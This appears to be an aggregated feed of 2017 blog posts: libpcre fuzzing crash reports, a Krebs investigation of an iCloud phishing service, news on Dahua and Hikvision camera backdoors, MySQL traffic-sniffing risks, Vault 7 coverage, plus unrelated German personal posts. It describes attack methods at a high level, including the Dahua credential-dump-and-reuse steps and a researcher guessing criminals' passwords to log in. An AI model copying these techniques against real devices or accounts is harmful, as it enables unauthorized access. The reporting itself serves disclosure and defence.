==26399==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000052db1c bp 0x7ffc7de68070 sp 0x7ffc7de67ba0 T0)                                                                                                                                            
==26399==The signal is caused by a READ memory access.                                                                                                                                                                                                                         
==26399==Hint: address points to the zero page.                                                                                                                                                                                                                                
    #0 0x52db1b in main /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:5083:25                                                                                                                                                                                   
    #1 0x7f70603bc78f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289                                                                                                                                                     
    #2 0x41b438 in _init (/usr/bin/pcretest+0x41b438) 
Affected version:
8.40

Fixed version:
8.41 (not released atm)

Commit fix:
https://vcs.pcre.org/pcre/code/trunk/pcretest.c?r1=1685&r2=1686&sortby=date

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
N/A

Reproducer:
https://github.com/asarubbo/poc/blob/master/00195-pcre-nullptr-main

Timeline:
2017-02-22: bug discovered and reported to upstream
2017-02-23: upstream released a patch
2017-03-14: blog post about the issue

Note:
This bug was found with American Fuzzy Lop.

Permalink:

libpcre: NULL pointer dereference in main (pcretest.c)

Top

libpcre: invalid memory read in phar (pcretest.c)

Postby ago via agostino's blog »

Description:
libpcre is a perl-compatible regular expression library.

A fuzz on libpcre1 through the pcretest utility revealed an invalid read in the utility itself. For the nature of the crash, it is not security relevant because the library is not affected but if you have a web application that calls directly the pcretest utility to parse untrusted data, then you are affected.
Also, it is important share the details because some distros/packagers may want to take the patch in their repository.

The complete ASan output:

# pcretest -16 -d $FILE
==28444==ERROR: AddressSanitizer: SEGV on unknown address 0x7f3c2de3e2dd (pc 0x0000005409dd bp 0x7fff0423db40 sp 0x7fff0423dac0 T0)
==28444==The signal is caused by a READ memory access.
    #0 0x5409dc in pchar /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:1986:5
    #1 0x54006f in pchars16 /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:2115:12
    #2 0x52e3e1 in main /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:5092:15
    #3 0x7f3c2dc3878f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289
    #4 0x41b438 in _init (/usr/bin/pcretest+0x41b438)
Affected version:
8.40

Fixed version:
8.41 (not released atm)

Commit fix:
https://vcs.pcre.org/pcre/code/trunk/pcretest.c?r1=1665&r2=1685&sortby=date

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
N/A

Reproducer:
https://github.com/asarubbo/poc/blob/master/00194-pcre-invalidread-phar

Timeline:
2017-02-22: bug discovered and reported to upstream
2017-02-22: upstream released a patch
2017-03-14: blog post about the issue

Note:
This bug was found with American Fuzzy Lop.

Permalink:

libpcre: invalid memory read in phar (pcretest.c)

Top

Confusing Branding

Postby kris via The Isoblog. »

Top

Nimuno – Lego Tape

Postby kris via The Isoblog. »

Once that is available for regular purchase, I will probably need 10 rolls or so.

Nimuno – Lego Tape
Top

If Your iPhone is Stolen, These Guys May Try to iPhish You

Postby BrianKrebs via Krebs on Security »

KrebsOnSecurity recently featured the story of a Brazilian man who was peppered with phishing attacks trying to steal his Apple iCloud username and password after his wife’s phone was stolen in a brazen daylight mugging. Today, we’ll take an insider’s look at an Apple iCloud phishing gang that appears to work quite closely with organized crime rings — within the United States and beyond  — to remotely unlock and erase stolen Apple devices.

Victims of iPhone theft can use the Find My iPhone feature to remotely locate, lock or erase their iPhone — just by visiting Apple’s site and entering their iCloud username and password. Likewise, an iPhone thief can use those iCloud credentials to remotely unlock the victim’s stolen iPhone, wipe the device, and resell it. As a result, iPhone thieves often subcontract the theft of those credentials to third-party iCloud phishing services. This story is about one of those services.

The iCloud account phishing text that John’s friend received months after losing a family iPhone.
Recently, I heard from a security professional whose close friend received a targeted attempt to phish his Apple iCloud credentials. The phishing attack came several months after the friend’s child lost his phone at a public park in Virginia. The phish arrived via text message and claimed to have been sent from Apple. It said the device tied to his son’s phone number had been found, and that its precise location could be seen for the next 24 hours by clicking a link embedded in the text message.

That security professional source — referred to as “John” for simplicity’s sake — declined to be named or credited in this story because some of the actions he took to gain the knowledge presented here may run afoul of U.S. computer fraud and abuse laws.

John said his friend clicked on the link in the text message he received about his son’s missing phone and was presented with a fake iCloud login page: appleid-applemx[dot]us. A lookup on that domain indicates it is hosted on a server in Russia that is or was shared by at least 140 other domains — mostly other apparent iCloud phishing sites — such as accounticloud[dot]site; apple-appleid[dot]store; apple-devicefound[dot]org; and so on (a full list of the domains at that server is available here).

While the phishing server may be hosted in Russia, its core users appear to be in a completely different part of the world. Examining the server more closely, John noticed that it was (mis)configured in a way that leaked data about various Internet addresses that were seen recently accessing the server, as well as the names of specific directories on the server that were being accessed.

After monitoring that logging information for some time, my source discovered there were five Internet addresses that communicated with the server multiple times a day, and that those address corresponded to devices located in Argentina, Colombia, Ecuador and Mexico.

He also found a file openly accessible on the Russian server which indicated that an application running on the server was constantly sending requests to imei24.com and imeidata.net — services that allow anyone to look up information about a mobile device by entering its unique International Mobile Equipment Identity (IMEI) number. These services return a variety of information, including the make and model of the phone, whether Find My iPhone is enabled for the device, and whether the device has been locked or reported stolen.

John said that as he was conducting additional reconnaissance of the Russian server, he tried to access “index.php” — which commonly takes one to a site’s home page — when his browser was redirected to “login.php” instead. The resulting page, pictured below, is a login page for an application called “iServer.” The login page displays a custom version of Apple’s trademarked logo as part of a pirate’s skull and crossbones motif, set against a background of bleeding orange flames.

The login page for an Apple iCloud credential phishing operation apparently used to unlock and remotely wipe stolen iPhones.
John told me that in addition to serving up that login page, the server also returned the HTML contents of the “index.php” he originally requested from the server. When he saved the contents of index.php to his computer and viewed it as a text file, he noticed it inexplicably included a list of some 137 user names, email addresses and expiration dates for various users who’d apparently paid a monthly fee to access the iCloud phishing service.

“These appear to be ‘resellers’ or people that have access to the crimeware server,” my source said of the user information listed in the server’s “index.php” file.



John told KrebsOnSecurity that with very little effort he was able to guess the password of at least two other users listed in that file. After John logged into the iCloud phishing service with those credentials, the service informed him that the account he was using was expired. John was then prompted to pay for at least one more month subscription access to the server to continue.

Playing along, John said he clicked the “OK” button indicating he wished to renew his subscription, and was taken to a shopping cart hosted on the domain hostingyaa[dot]com. That payment form in turn was accepting PayPal payments for an account tied to an entity called HostingYaa LLC; viewing the HTML source on that payment page revealed the PayPal account was tied to the email address “admin@hostingyaa[dot]com.”

According to the file coughed up by the Russian server, the first username in that user list — demoniox12 — is tied to an email address admin@lanzadorx.net and to a zero-dollar subscription to the phishing service. This strongly indicates the user in question is an administrator of this phishing service.

A review of Lanzadorx[dot]net indicates that it is a phishing-as-a-service offering that advertises the ability to launch targeted phishing attacks at a variety of free online services, including accounts at Apple, Hotmail, Gmail and Yahoo, among others.

A reverse WHOIS lookup ordered from Domaintools.com shows that the admin@lanzadorx.net email is linked to the registration data for exactly two domains — hostingyaa[dot]info and lanzadorx[dot]net [full disclosure: Domaintools is currently one of several advertisers on KrebsOnSecurity].

Hostingyaa[dot]info is registered to a Dario Dorrego, one of the other zero-dollar accounts included near the top of the list of users that are authorized to access the iCloud phishing service. The site says Dorrego’s account corresponds to the email address dario@hostingyaa[dot]com. That name Dario Dorrego also appears in the site registration records for 31 other Web site domains, all of which are listed here.

John said he was able to guess the passwords for at least six other accounts on the iCloud phishing service, including one particularly interesting user and possible reseller of the service who picked the username “Jonatan.” Below is a look at the home screen for Jonatan’s account on this iCloud phishing service. We can see the system indicates Jonatan was able to obtain at least 65 “hacked IDs” through this service, and that he pays USD $80 per month for access to it.

“Jonatan,” a user of this iCloud account credential phishing service. Note the left side panel indicates the number of records and hacked IDs recorded for Jonatan’s profile.
Here are some of the details for “Tanya,” one such victim tied to Jonatan’s account. Tanya’s personal details have been redacted from this image:

This page from the iCloud phishing service shows the redacted account details phished from an iPhone user named Tanya.
Here is the iCloud phishing page Tanya would have seen if she clicked the link sent to her via text message. Note that the victim’s full email address is automatically populated into the username portion of the login page to make the scam feel more like Apple’s actual iCloud site:



The page below from Jonatan’s profile lists each of his 60+ victims individually, detailing their name, email address, iCloud password, phone number, unique device identifier (IMEI), iPhone model/generation and some random notes apparently inserted by Jonatan:



The next screen shot shows the “SMS sent” page. It tracks which victims were sent which variation of phishing scams offered by the site; whether targets had clicked a link in the phony iCloud phishing texts; and if any of those targets ever visited the fake iCloud login pages:



Users of this phishing service can easily add a new phishing domain if their old links get cleaned up or shut down by anti-phishing and anti-spam groups. This service also advertises the ability to track when phishing links have been flagged by anti-phishing companies:



This is where the story turns both comical and ironic. Many times, attackers will test their exploit on themselves whilst failing to fully redact their personal information. Jonatan apparently tested the phishing attacks on himself using his actual Apple iCloud credentials, and this data was indexed by Jonatan’s phishing account at the fake iCloud server. In short, he phished himself and forgot to delete the successful results. Sorry, but I’ve blurred out Jonatan’s iCloud password in the screen shot here:



See if you can guess what John did next? Yes, he logged into Jonatan’s iCloud account. Helpfully, one of the screenshots in the photos saved to Jonatan’s iCloud account is of Jonatan logged into the same phishing server that leaked his iCloud account information!



The following advertisement for Jonatan’s service — also one of the images John found in Jonatan’s iCloud account — includes the prices he charges for his own remote iPhone unlocking service. It appears the pricing is adjusted upwards considerably for phishing attacks on newer model stolen iPhones. The price for phishing an iPhone 4 or 4s is $40 per message, versus $120 per message for phishing attacks aimed at iPhone 6s and 6s plus users. Presumably this is because the crooks hiring this service stand to make more money selling newer phones.



The email address that Jonatan used to register on the Apple iPhone phishing service — shown in one of the screen shots above as jona_icloud@hotmail.com — also was used to register an account on Facebook tied to a Jonatan Rodriguez who says he is from Puerto Rico. It just so happens that this Jonatan Rodriguez on Facebook also uses his profile to advertise a “Remove iCloud” service. What are the odds?

Jonatan’s Facebook profile page.
Well, pretty good considering this Facebook user also is the administrator of a Facebook Group called iCloud Unlock Ecuador – Worldwide. Incredibly, Facebook says there are 2,797 members of this group. Here’s what they’re all about:



Jonatan’s Facebook profile picture would have us believe that he is a male model, but the many selfies he apparently took and left in his iCloud account show a much softer side of Jonatan:

Jonatan, in a selfie he uploaded to his iCloud account. Jonatan unwittingly gave away the credentials to his iCloud account because the web site where his iCloud account phishing service provider was hosted had virtually no security (nor did Jonatan, apparently). Other photos in his archive include various ads for his iPhone unlocking service.
Among the members of this Facebook group is one “Alexis Cadena,” whose name appears in several of the screenshots tied to Jonatan’s account in the iCloud phishing service:



Alexis Cadena apparently also has his own iCloud phishing service. It’s not clear if he sub-lets it from Jonatan or what, but here are some of Alexis’s ads:



Coming back to Jonatan, the beauty of the iCloud service (and the lure used by Jonatan’s phishing service) is that iPhones can be located fairly accurately to a specific address. Alas, because Jonatan phished his own iCloud account, we can see that according to Jonatan’s iCloud service, his phone was seen in the following neighborhood in Ecuador on March 7, 2017. The map shows a small radius of a few blocks within Yantzaza, a town of 10,000 in southern Educador:

Jonatan’s home town, according to the results of his “find my iphone” feature in iCloud.
Jonatan did not respond to multiple requests for comment.
Top

This month in vc4 (2017-03-13): docs, porting, tiled display

Postby Eric Anholt via anholt's lj »

It's been a while since I've posted a status update.  Here are a few things that have been going on.

VC4 now generates HTML documentation from the comments in the kernel code.  It's just a start, but I'm hoping to add more technical details of how the system works here.  I don't think doxygen-style documentation of individual functions would be very useful (if you're calling vc4 functions, you're editing the vc4 driver, unlike library code), so I haven't pursued that.

I've managed to get permission to port my 3D driver to another platform, the 911360 enterprise phone that's already partially upstreamed.  It's got a VC4 V3D in it (slightly newer than the one in Raspberry Pi), but an ARM CLCD controller for the display.  The 3D came up pretty easily, but for display I've been resurrecing Tom Cooksey's old CLCD KMS driver that never got merged.  After 3+ years of DRM core improvements, we get to delete half of the driver he wrote and just use core helpers instead.  Completing this work will require that I get the dma-buf fencing to work right in vc4, which is something that Android cares about.

Spurred on by a report from one of the Processing developers, I've also been looking at register allocation troubles again.  I've found one good opportunity for reducing register pressure in Processing by delaying FS/VS input loads until they're actually used, and landed and then reverted one patch trying to accomplish it.  I also took a look at DEQP's register allocation failures again, and fixed a bunch of its testcases with a little scheduling fix.

I've also started on a fix to allow arbitrary amounts of CMA memory to be used for vc4.  The 256MB CMA limit today is to make sure that the tile state buffer and tile alloc/overflow buffers are in the same 256MB region due to a HW addressing bug.  If we allocate a single buffer that can contain tile state, tile alloc, and overflow all at once within a 256MB area, then all the other buffers in the system (texture contents, particularly) can go anywhere in physical address space.  The set top box group did some testing, and found that of all of their workloads, 16MB was enough to get any job completed, and 28MB was enough to get bin/render parallelism on any job.  The downside is that a job that's too big ends up just getting rejected, but we'll surely run out of CMA for all your textures before someone hits the bin limit by having too many vertices per pixel.

Eben recently pointed out to me that the HVS can in fact scan out tiled buffers, which I had thought it wasn't able to.  Having our window system buffers be linear means that when we try to texture from it (your compositing manager's drawing and uncomposited window movement for example) we have to first do a copy to the tiled format. The downside is that, in my measurements, we lose up to 1.4% of system performance (as measured by memcpy bandwidth tests with the 7" LCD panel for display) due to the HVS being inefficient at reading from tiled buffers (since it no longer gets to do large burst reads).  However, this is probably a small price to pay for the massive improvement we get in graphics operations, and that cost could be reduced by X noticing that the display is idle and swapping to a linear buffer instead.  Enabling tiled scanout is currently waiting for the new buffer modifiers patches to land, which Ben Widawsky at Intel has been working on.

There's no update on HDMI audio merging -- we're still waiting for any response from the ALSA maintainers, despite having submitted the patch twice and pinged on IRC.
Top

r610

Postby Dan Langille via Dan Langille's Other Diary »

I’ve been given a Dell PowerEdge R610. I’ve installed two 30GB SSDs and installed FreeBSD 11 on it. It will become a tape library server. The swap: The zpools: Oh, well, that’s a problem. Let’s fix it: There. Fixed. Just. Like. That.™ The filesystems: And dmesg:
Top

Dahua, Hikvision IoT Devices Under Siege

Postby BrianKrebs via Krebs on Security »

Dahua, the world’s second-largest maker of “Internet of Things” devices like security cameras and digital video recorders (DVRs), has shipped a software update that closes a gaping security hole in a broad swath of its products. The vulnerability allows anyone to bypass the login process for these devices and gain remote, direct control over vulnerable systems. Adding urgency to the situation, there is now code available online that allows anyone to exploit this bug and commandeer a large number of IoT devices.

On March 5, a security researcher named Bashis posted to the Full Disclosure security mailing list exploit code for an embarrassingly simple flaw in the way many Dahua security cameras and DVRs handle authentication. These devices are designed to be controlled by a local Web server that is accessible via a Web browser.

That server requires the user to enter a username and password, but Bashis found he could force all affected devices to cough up their usernames and a simple hashed value of the password. Armed with this information, he could effectively “pass the hash” and the corresponding username right back to the Web server and be admitted access to the device settings page. From there, he could add users and install or modify the device’s software. From Full Disclosure:

“This is so simple as:
1. Remotely download the full user database with all credentials and permissions
2. Choose whatever admin user, copy the login names and password hashes
3. Use them as source to remotely login to the Dahua devices

“This is like a damn Hollywood hack, click on one button and you are in…”

Bashis said he was so appalled at the discovery that he labeled it an apparent “backdoor” — an undocumented means of accessing an electronic device that often only the vendor knows about. Enraged, Bashis decided to publish his exploit code without first notifying Dahua. Later, Bashis said he changed his mind after being contacted by the company and agreed to remove his code from the online posting.

Unfortunately, that ship may have already sailed. Bashis’s exploit code already has been copied in several other places online as of this publication.

Asked why he took down his exploit code, Bashis said in an interview with KrebsOnSecurity that “The hack is too simple, way too simple, and now I want Dahua’s users to get patched firmware’s before they will be victims to some botnet.”

In an advisory published March 6, Dahua said it has identified nearly a dozen of its products that are vulnerable, and that further review may reveal additional models also have this flaw. The company is urging users to download and install the newest firmware updates as soon as possible. Here are the models known to be affected so far:

DH-IPC-HDW23A0RN-ZS
DH-IPC-HDBW23A0RN-ZS
DH-IPC-HDBW13A0SN
DH-IPC-HDW13A0SN
DH-IPC-HFW13A0SN-W
DH-IPC-HDBW13A0SN
DH-IPC-HDW13A0SN
DH-IPC-HFW13A0SN-W
DHI-HCVR51A04HE-S3
DHI-HCVR51A08HE-S3
DHI-HCVR58A32S-S2

It’s not clear exactly how many devices worldwide may be vulnerable. Bashis says that’s a difficult question to answer, but that he “wouldn’t be surprised if 95 percent of Dahua’s product line has the same problem,” he said. “And also possible their OEM clones.”

Dahua has not yet responded to my questions or request for comment. I’ll update this post if things change on that front.

This is the second time in a week that a major Chinese IoT firm has urgently warned its customers to update the firmware on their devices. For weeks, experts have been warning that there are signs of attackers exploiting an unknown backdoor or equally serious vulnerability in cameras and DVR devices made by IoT giant Hikvision.

Writing for video surveillance publication IPVM, Brian Karas reported on March 2 that he was hearing from multiple Hikvision security camera and DVR users who suddenly were locked out of their devices and had new “system” user accounts added without their permission.

Karas said the devices in question all were set up to be remotely accessible over the Internet, and were running with the default credentials (12345). Karas noted that there don’t appear to be any Hikvision devices sought out by the Mirai worm — the now open-source malware that is being used to enslave IoT devices in a botnet for launching crippling online attacks (in contrast, Dahua’s products are hugely represented in the list of systems being sought out by the Mirai worm.)

In addition, a programmer who has long written and distributed custom firmware for Hikvision devices claims he’s found a backdoor in “many popular Hikvision products that makes it possible to gain full admin access to the device,” wrote the user “Montecrypto” on the IoT forum IPcamtalk on Mar. 5. “Hikvision gets two weeks to come forward, acknowledge, and explain why the backdoor is there and when it is going to be removed. I sent them an email. If nothing changes, I will publish all details on March 20th, along with the firmware that disables the backdoor.”

According to IPVM’s Karas, Hikvision has not acknowledged an unpatched backdoor or any other equivalent weakness in its product. But on Mar. 2, the company issued a reminder to its integrator partners about the need to be updated to the latest firmware.

A special bulletin issued Mar. 2, 2017 by Hikvision. Image: IPVM
“Hikvision has determined that there is a scripted application specifically targeting Hikvision NVRs and DVRs that meet the following conditions: they have not been updated to the latest firmware; they are set to the default port, default user name, and default password,” the company’s statement reads. “Hikvision has required secure activation since May of 2015, making it impossible for our integrator partners to install equipment with default settings. However, it was possible, before that date, for integrators to install NVRs and DVRs with default settings. Hikvision strongly recommends that our dealer base review the security levels of equipment installed prior to June 2015 to ensure the use of complex passwords and upgraded firmware to best protect their customers.”

ANALYSIS

I don’t agree with Bashis’s conclusion that the Dahua flaw was intentional; It appears that the makers of these products simply did not invest much energy, time or money in building security into the software. Rather, security is clearly an afterthought that is bolted on afterwards with these devices, which is why nobody should trust them.

The truth is that the software that runs on a whole mess of these security cameras and DVRs is very poorly written, and probably full of more security holes just like the flaw Dahua users are dealing with right now. To hope or wish otherwise given what we know about the history of these cheap electronic devices seems sheer folly.

In December, KrebsOnSecurity warned that many Sony security cameras contained a backdoor that can only be erased by updating the firmware on the devices.

Some security experts maintain that these types of flaws can’t be easily exploited when the IoT device in question is behind a firewall. But that advice just doesn’t hold water for today’s IoT cameras and DVRs. For one thing, a great many security cameras and other IoT devices will punch a hole in your firewall straight away without your permission, using a technology called Universal Plug-and-Play (UPnP).

In other cases, IoT products are incorporating peer-to-peer (P2P) technology that cannot be turned off and exposes users to even greater threats.  In that same December 2016 story referenced above, I cited research from security firm Cybereason, which found at least two previously unknown security flaws in dozens of IP camera families that are white-labeled under a number of different brands (and some without brands at all).

“Cybereason’s team found that they could easily exploit these devices even if they were set up behind a firewall,” that story noted. “That’s because all of these cameras ship with a factory-default peer-to-peer (P2P) communications capability that enables remote ‘cloud’ access to the devices via the manufacturer’s Web site — provided a customer visits the site and provides the unique camera ID stamped on the bottom of the devices.”

The story continued:

“Although it may seem that attackers would need physical access to the vulnerable devices in order to derive those unique camera IDs, Cybereason’s principal security researcher Amit Serper said the company figured out a simple way to enumerate all possible camera IDs using the manufacturer’s Web site.”

My advice? Avoid the P2P models like the plague. If you have security cameras or DVR devices that are connected to the Internet, make sure they are up to date with the latest firmware. Beyond that, consider completely blocking external network access to the devices and enabling a VPN if you truly need remote access to them.

Howtogeek.com has a decent tutorial on setting up your own VPN to enable remote access to your home or business network; on picking a decent router that supports VPNs; and installing custom firmware like DD-WRT on the router if available (because, as we can see, stock firmware usually is some horribly insecure and shoddy stuff).

If you’re curious about an IoT device you purchased and what it might do after you connect it to a network, the information is there if you know how and where to look. This Lifehacker post walks through some of the basic software tools and steps that even a novice can follow to learn more about what’s going on across a local network.
Top

Network attacks on MySQL, Part 1: Unencrypted connections

Postby Daniël van Eeden via Daniël's Database Blog »

Intro

In a set of blog posts I will explain to you how different attacks on the network traffic of MySQL look like and what you can do to secure your systems againt these kinds of attacks.

How to gain access

To gain access to MySQL network traffic you can use tcpdump, dumpcap, snoop or whatever the tool to capture network packets on your OS is. This can be on any device which is part of the connnection: the server, the client, routers, switches, etc.

Besides application-to-database traffic this attack can also be done on replication traffic.

Results

This allows you to extract queries and result sets.

The default password hash type mysql_new_password uses a nonce to protect against password sniffing. But when you change a password this will be sent accross the wire by default. Note that MySQL 5.6 and newer has some protection which ensures passwords are not sent to the logfiles, but this feature won't secure your network traffic.

In the replication stream however there are not as many places where passwords are exposed. This is true especially for row based replication, but even for statement based replication this can be true.

Some examples:

SET PASSWORD FOR 'myuser'@'%' = PASSWORD('foo'); -- deprecated syntax
UPDATE secrets SET secret_value = AES_ENCRYPT('foo', 'secret') WHERE id=5;
For both the password and the encryption key this can be seen in plain text for application-to-server traffic, but not for RBR replication traffic.

There is a trick to make this somewhat more secure, especially on 5.5 and older:

SELECT PASSWORD('foo') INTO @pwd;
SET PASSWORD FOR 'myuser'@'%' = @a;
If your application stores passwords in MySQL: You're doing it wrong. If your application stores hashed passwords (w/ salt, etc): If the hashing is done in your application: this is ok. But note that a man-in-the-middle might send a slightly altered resultset to your application and with this gain access to your application, but that requires an active attack.

This attacks for this level are mostly passive, which makes it hard to detect. An attacker might snif password hashes for your appliation and brute force them and then login to your application. The only thing you will see in your logs is a successful login...

To protect against this attack:

  1. Use SSL/TLS
  2. Encrypt/Decrypt values in the application before inserting it in the database.
  3. Use a SSH tunnel (Workbench has built-in support for this)
  4. Use a local TCP or UNIX domain socket when changing passwords.[1]
  5. Don't use the MySQL protocol over the internet w/o encryption. Use a VPN or SSH.
For sensitive data you preferably should combine 1. and 2. Item 3. and 4. are mostly for ad-hoc DBA access.

Keep in mind that there might be some cron jobs, backups etc. which also need to use a secure connection. Ofcourse you should also protect your data files and backup files, but that's not what this post is about.

[1] It is possible to snoop on UNIX domain socket traffic, but an attacker who has that access probably has full system access and might more easily use an active attack.
Top

WikiLeaks: We’ll Work With Software Makers on Zero-Days

Postby BrianKrebs via Krebs on Security »

When WikiLeaks on Tuesday dumped thousands of files documenting hacking tools used by the U.S. Central Intelligence Agency, many feared WikiLeaks would soon publish a trove of so-called “zero days,” the actual computer code that the CIA uses to exploit previously unknown flaws in a range of software and hardware products used by consumers and businesses. But on Thursday, WikiLeaks editor-in-chief Julian Assange promised that his organization would work with hardware and software vendors to fix the security weaknesses prior to releasing additional details about the flaws.

“After considering what we think is the best way to proceed, and hearing these calls from some of the manufacturers, we have decided to work with them to give them exclusive access to additional technical details we have, so that fixes can be developed and pushed out,” Assange said in a press conference put on by his organization. “Once this material is effectively disarmed by us, we will publish additional details about what has been occurring.”

Source: Twitter
So-called “zero-day” flaws refer to vulnerabilities in hardware or software products that vendors first learn about when those flaws are already under active attack (i.e., the vendor has “zero days” to fix the vulnerability before it begins affecting its customers and users). Zero-day flaws are highly prized by cybercriminals and nation states alike because they potentially allow attackers to stealthily bypass a target’s digital defenses.

It’s unclear if WikiLeak’s decision to work with software makers on zero-days was impacted by a poll the organization took via its Twitter page over the past few days. The tweet read: “Tech companies are saying they need more details of CIA attack techniques to fix them faster. Should WikiLeaks work directly with them?”

So far, just over 38,000 people have responded, with a majority (57 percent) saying “Yes, make people safe,” while only 36 percent selected “no, they’re part of the problem.”

Assange didn’t offer additional details about the proposed information-sharing process he described, such as whether WikiLeaks would seek to work with affected vendors individually or if it might perhaps rely on a trusted third-party or third-parties to assist in that process.

But WikiLeaks seemed eager to address concerns voiced by many tech experts that leaking details about how to exploit these cyber attack weapons developed by the CIA would leave consumers and businesses caught in the middle as crooks and individual actors attempt to use the exploits for personal or financial gain. Perhaps to assuage such concerns, Assange said his vision for WikiLeaks was to act as a “neutral digital Switzerland that assists people all over the world to be secure.”

Nevertheless, even just the documentation on the CIA’s hacking tools that was released this week may offer curious and skilled hackers some strong pointers about where to look for unpatched security flaws that could be used to compromise systems running those software products. It will be interesting to see if and how often security researchers and bug hunters going forward credit the WikiLeaks CIA document dump for leading their research in a direction they hadn’t before considered.
Top

pclinuxos64-kde5-2017.03.iso

Postby bed via Zockertown: Nerten News »

Angeregt durch eine Diskussion in meinem Lieblingsforum habe ich mal die Live Version von pclinuxos64-kde5-2017.03

angetestet.

Positiv: Alle Fn Tasten wie Lautstärke, Tastatur Hintergrundbeleuchtung und Bildschirmhelligkeit, funktionieren auf Anhieb.

Suspend2Ram  beim Deckel zuklappen und aufwachen funktionert perfekt und schnell.

WiFi musste ich ein wenig suchen, klappt aber.

Nvidia Treiber automatisch installiert und funktioniert. Bravo. 

Negativ oder ungewohnt: siehe Screenshot, da passt doch was mit den Fonts nicht, oder?

Ich habe zwei Crashes beim rumspielen mit Localisation erlebt, nun ja, kann an der Live liegen 

Achso, Testobjekt war mein derzeitiger Laptop Tuxedo XC1506 



Top

Produktbezeichnungen und was ich davon halte

Postby bed via Zockertown: Nerten News »

Wie viel Prozent einer Zutat muss im Produkt sein, um im Namen an erster Stelle zu stehen? 

Bei Leberwurst z.B. ist das klar geregelt und bei vegetarischen Produkten?

Da gibt es einen Aufstrich von DM, auf dem Glas steht Ingwer-Linse, wobei Ingwer deutlich hervorgehoben ist.

Im Web bei dm finde ich abgeschwächt die umgekehrte Bezeichnung: dmBio Aufstrich Linse-Ingwer.

Ok, dachte ich, kann ich ja mal probieren. Ich hab's probiert und kann es nicht fassen, kaum nachweisbares Ingwer Aroma, der Blick aufs Etikett enthüllt: 0,7% Ingwer.

Leute, wollt ihr mich verarschen? weniger als 1% Ingwer?

Top

megaglest

Postby bed via Zockertown: Nerten News »

Glest habe ich vor gefühlt 250 Jahren mal aus den Quellen übersetzt und ausprobiert, wenn ich mich richtig entsinne, war das damals eine arge Enttäuschung, weil das Game nicht an die Warcraft Reihe heran kam. Irgendwie habe ich es aus den Augen verloren, vielleicht gabe es zu der Zeit auch einfach andere Dinge.

Nun sind viele Jahre vergangen, Glest ist praktisch tot, aber ein Spinoff --MegaGlest-- hat seit 2012 die Bühne betreten und eine Qualität erreicht, die mich übermannt hat.

Heute (2017-01-21 19:12 ) bin ich zufällig darüber gestolpert und habe mir megaglest aus dem Debian Repository installiert und angespielt.

Ich möchte mich hier in aller Form bei den Mitwirkenden, also nicht nur den Entwicklern bedanken, dass sie am Ball geblieben sind.

Bei Wikipedia gibt es einen schönen Artikel über MegaGlest, deshalb will ich hier nicht noch ein Plagiat veröffentlichen, sondern den geneigten Leser zum Wikipedia Artikel leiten.

Für mich die ins Auge springenden Features die Zoomfähigkeit, dadurch kommen die liebevoll gemachten Animationen der Charaktere schön zur Geltung.

Ps: Warum ich das erst heute veröffentliche? Weil ich nicht bemerkt hatte, dass der Titel noch auf Entwurf stand
Top

WikiLeaks Dumps Docs on CIA’s Hacking Tools

Postby BrianKrebs via Krebs on Security »

WikiLeaks on Tuesday dropped one of its most explosive word bombs ever: A secret trove of documents apparently stolen from the U.S. Central Intelligence Agency (CIA) detailing methods of hacking everything from smart phones and TVs to compromising Internet routers and computers. KrebsOnSecurity is still digesting much of this fascinating data cache, but here are some first impressions based on what I’ve seen so far.

First, to quickly recap what happened: In a post on its site, WikiLeaks said the release — dubbed “Vault 7” — was the largest-ever publication of confidential documents on the agency. WikiLeaks is promising a series of these document caches; this first one includes more than 8,700 files allegedly taken from a high-security network inside CIA’s Center for Cyber Intelligence in Langley, Va.

The home page for the CIA’s “Weeping Angel” project, which sought to exploit flaws that could turn certain 2013-model Samsung “smart” TVs into remote listening posts.
“Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized ‘zero day’ exploits, malware remote control systems and associated documentation,” WikiLeaks wrote. “This extraordinary collection, which amounts to more than several hundred million lines of code, gives its possessor the entire hacking capacity of the CIA. The archive appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive.”

Wikileaks said it was calling attention to the CIA’s global covert hacking program, its malware arsenal and dozens of weaponized exploits against “a wide range of U.S. and European company products, includ[ing] Apple’s iPhone, Google’s Android and Microsoft’s Windows and even Samsung TVs, which are turned into covert microphones.”

The documents for the most part don’t appear to include the computer code needed to exploit previously unknown flaws in these products, although WikiLeaks says those exploits may show up in a future dump. This collection is probably best thought of as an internal corporate wiki used by multiple CIA researchers who methodically found and documented weaknesses in a variety of popular commercial and consumer electronics.

For example, the data dump lists a number of exploit “modules” available to compromise various models of consumer routers made by companies like Linksys, Microtik and Zyxel, to name a few. CIA researchers also collated several pages worth of probing and testing weaknesses in business-class devices from Ciscowhose powerful routers carry a decent portion of the Internet’s traffic on any given day. Craig Dods, a researcher with Cisco’s rival Juniper, delves into greater detail on the Cisco bugs for anyone interested (Dods says he found no exploits for Juniper products in the cache, yet). Meanwhile, Cisco has published its own blog post on the matter.

WHILE MY SMART TV GENTLY WEEPS

Some of the exploits discussed in these leaked CIA documents appear to reference full-on, remote access vulnerabilities. However, a great many of the documents I’ve looked at seem to refer to attack concepts or half-finished exploits that may be limited by very specific requirements — such as physical access to the targeted device.

The “Weeping Angelproject’s page from 2014 is a prime example: It discusses ways to turn certain 2013-model Samsung “smart TVs” into remote listening devices; methods for disabling the LED lights that indicate the TV is on; and suggestions for fixing a problem with the exploit in which the WiFi interface on the TV is disabled when the exploit is run.

ToDo / Future Work:
Build a console cable

Turn on or leave WiFi turned on in Fake-Off mode

Parse unencrypted audio collection
Clean-up the file format of saved audio. Add encryption??

According to the documentation, Weeping Angel worked as long as the target hadn’t upgraded the firmware on the Samsung TVs. It also said the firmware upgrade eliminated the “current installation method,” which apparently required the insertion of a booby-trapped USB device into the TV.

